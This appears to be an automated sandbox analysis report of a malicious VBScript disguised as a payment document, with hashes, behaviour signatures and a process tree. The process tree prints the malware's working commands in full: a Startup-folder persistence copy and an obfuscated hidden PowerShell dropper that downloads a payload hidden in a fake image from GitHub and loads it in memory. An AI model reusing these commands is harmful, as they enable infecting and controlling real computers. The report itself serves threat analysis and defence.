Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-10-2024 07:11

General

  • Target

    Swift Payment 20241014839374.vbs

  • Size

    193KB

  • MD5

    7bf746f21b05c1eb932ba35c5215e940

  • SHA1

    aa69f725076d84e5fac54816caf29864d007e8da

  • SHA256

    312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891

  • SHA512

    4d85a6ed27ba76fc295ea8bd24cb03bd801bf15d74561af5e24d77ff321960fdc32a6ada12b06865ce3e0002c422ce02ef3e6e11a97be1f8b47cfe6e8facd29f

  • SSDEEP

    3072:8mpzxQF4KEDwjHUiIgt5p5Gw4fiLQtUWBrSp8muIJ8oH7lT:8FF4KEMjHiNrSV8CV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Swift Payment 20241014839374.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Swift Payment 20241014839374.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.anotned.vbs')')
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\system32\PING.EXE
        ping 127.0.0.1 -n 10
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\Swift Payment 20241014839374.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.anotned.vbs')')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2900
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVsTGlEWzFdKyRTaEVMTElkWzEzXSsneCcpKCAoKCd7MH1pbWFnZVVyJysnbCA9IHsxfWh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDt7MH1pbWFnZUJ5dGVzID0gezB9Jysnd2ViQ2xpZW50LkRvd25sb2FkRGF0YSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9c3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBJysnUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfScrJ3N0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgezB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3RoO3swfWJhJysnc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJJysnbmRleDt7MH1iYXNlNjRDbycrJ21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCAnKyd7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlJysnNjRTJysndHJpbmcoezB9YmFzZTY0Q29tbWFuZCk7ezB9bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzJysnZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyknKyc7ezB9dmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkcnKydldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCh7MX0wLzYxNnJyL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgJysnezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9QWRkSW5Qcm8nKydjZXNzMzJ7MX0sIHsnKycxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLUZbY2hhUl0zNixbY2hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2920
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHElLiD[1]+$ShELLId[13]+'x')( (('{0}imageUr'+'l = {1}https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg {1};{0}webClient = New-Object System.Net.WebClien'+'t;{0}imageBytes = {0}'+'webClient.DownloadData({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString({0}imageBytes);{0}startFlag = {1}<<BASE64_STA'+'RT>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}'+'startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}ba'+'se64Length = {0}endIndex - {0}startI'+'ndex;{0}base64Co'+'mmand = {0}imageText.Substring({0}startIndex, '+'{0}base64Length);{0}commandBytes = [System.Convert]::FromBase'+'64S'+'tring({0}base64Command);{0}loadedAssembly = [System.Reflection.Ass'+'embly]::Load({0}commandBytes)'+';{0}vaiMethod = [dnlib.IO'+'.Home].G'+'etMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @({1}0/616rr/d/ee.etsap//:sptth{1}'+', '+'{1}desa'+'tivado{1}, {1}desativado{1}, {1}desa'+'tivado{1}, {1}AddInPro'+'cess32{1}, {'+'1}desativado{1}, {1}desativado{1}));') -F[chaR]36,[chaR]39))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    1bacf12913998c3b54f03ece52f79323

    SHA1

    2e662511c871f74c4576a8df3a086b3efa099269

    SHA256

    942fc62b18e49f6682d9faf8ed5d8f61f1cb28665ceffe7c8aef59e3427972fe

    SHA512

    f9bb8c9562f6aec9d15f602a5bb6878278fb5303f3fa4ffd54ab772fc229179f35a5877c6cbb1806c02c4f78547e279d464187a91b96166bc6afb024aecb08da

  • memory/2900-6-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

  • memory/2900-5-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

    Filesize

    4KB

  • memory/2900-9-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2900-10-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2900-11-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2900-12-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2900-13-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2900-7-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2900-8-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

    Filesize

    9.6MB

  • memory/2920-19-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

  • memory/2920-20-0x0000000002C00000-0x0000000002C08000-memory.dmp

    Filesize

    32KB